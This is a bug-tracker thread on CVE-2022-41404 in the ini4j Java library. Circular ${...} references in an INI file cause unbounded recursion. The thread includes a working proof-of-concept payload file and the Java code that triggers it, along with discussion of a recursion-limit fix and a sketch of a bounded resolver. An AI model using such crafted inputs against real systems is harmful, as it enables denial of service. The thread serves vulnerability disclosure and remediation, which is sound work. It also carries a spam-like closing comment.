The package org.ini4j before 0.5.4 are vulnerable to get value via the...
Brought to you by:
szkiba
Test logic usable to reproduce the behaviour
payload:
----payload.ini
[dopey]
weight = ${bashful/weight}
height = ${doc/height}
[bashful]
weight = ${dopey/weight}
height = ${dopey/height}
[doc]
weight = 49.5
height = 87.7
----java poc
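import java.io.File;
import java.io.FileReader;
import org.ini4j.Ini;
// Load the payload above, then fetch a value whose ${...} references point back at each other.
Ini ini = new Ini();
ini.load(new FileReader(new File("/Users/bingdian/IdeaProjects/soot/src/main/java/test.ini")));
ini.get("dopey").fetch("weight");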
@szkiba, @bingdian: the description mentions that the issue is present before version 0.5.4. Can you elaborate where the issue was fixed landing in that version?
I have taken a quick look at the source code; the problem seems to come from the recursive calls from the BasicProfileSection.fetch and BasicProfile.resolve methods... the recursive loop is still present in version 0.54, without any limitation.
I tried to limit the number of recursions.
Can this modification solve the above problem?
https://github.com/SuperMap/ini4j/commit/917865af0244c32fafe9939fe69af6577f9a6077
Last edit: paradox 2022-12-09
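The mitigation discussed in the comments above (bounding the recursive reference resolution), sketched as an added example; it is not ini4j's code and not the linked commit. The class name BoundedResolver, the MAX_DEPTH value and the restriction to the ${section/option} form are assumptions made for illustration, and the sample data is the payload from this ticket.

```java
import java.util.*;
import java.util.regex.*;

// Added illustration (Java 9+): standalone resolver, not ini4j's BasicProfile code.
public class BoundedResolver {
    private static final Pattern REF = Pattern.compile("\\$\\{([^/}]+)/([^}]+)\\}");
    private static final int MAX_DEPTH = 16; // assumed limit, hypothetical value
    private final Map<String, Map<String, String>> ini;
    BoundedResolver(Map<String, Map<String, String>> ini) { this.ini = ini; }

    String fetch(String section, String option) {
        return resolve(section, option, new LinkedHashSet<>());
    }

    // inProgress holds the chain of keys currently being resolved.
    private String resolve(String section, String option, Set<String> inProgress) {
        String key = section + "/" + option;
        if (!inProgress.add(key)) { // key already on the chain: a cycle
            throw new IllegalStateException("circular reference: " + inProgress + " -> " + key);
        }
        if (inProgress.size() > MAX_DEPTH) { // long but acyclic chains are bounded too
            throw new IllegalStateException("reference chain deeper than " + MAX_DEPTH);
        }
        String raw = ini.getOrDefault(section, Map.of()).get(option);
        if (raw == null) { inProgress.remove(key); return null; }
        Matcher m = REF.matcher(raw);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            String v = resolve(m.group(1), m.group(2), inProgress);
            // Unknown references are left in place as literal text.
            m.appendReplacement(out, Matcher.quoteReplacement(v == null ? m.group() : v));
        }
        m.appendTail(out);
        inProgress.remove(key);
        return out.toString();
    }

    public static void main(String[] args) {
        Map<String, Map<String, String>> ini = Map.of( // payload.ini from this ticket
            "dopey", Map.of("weight", "${bashful/weight}", "height", "${doc/height}"),
            "bashful", Map.of("weight", "${dopey/weight}", "height", "${dopey/height}"),
            "doc", Map.of("weight", "49.5", "height", "87.7"));
        BoundedResolver r = new BoundedResolver(ini);
        System.out.println(r.fetch("bashful", "height")); // acyclic chain resolves
        try {
            r.fetch("dopey", "weight"); // dopey/weight <-> bashful/weight
        } catch (IllegalStateException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Tracking the keys currently being resolved rejects the cycle on its first repeat, while the depth cap keeps a long acyclic chain from exhausting the stack.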
This issue was assigned CVE-2022-41404.
It would be great to resolve this issue - can the project maintainer please accept the requested change and make a release?
Yeah, I also have to use it in Remini mod apk. Can you confirm?
Last edit: Layne 2023-10-31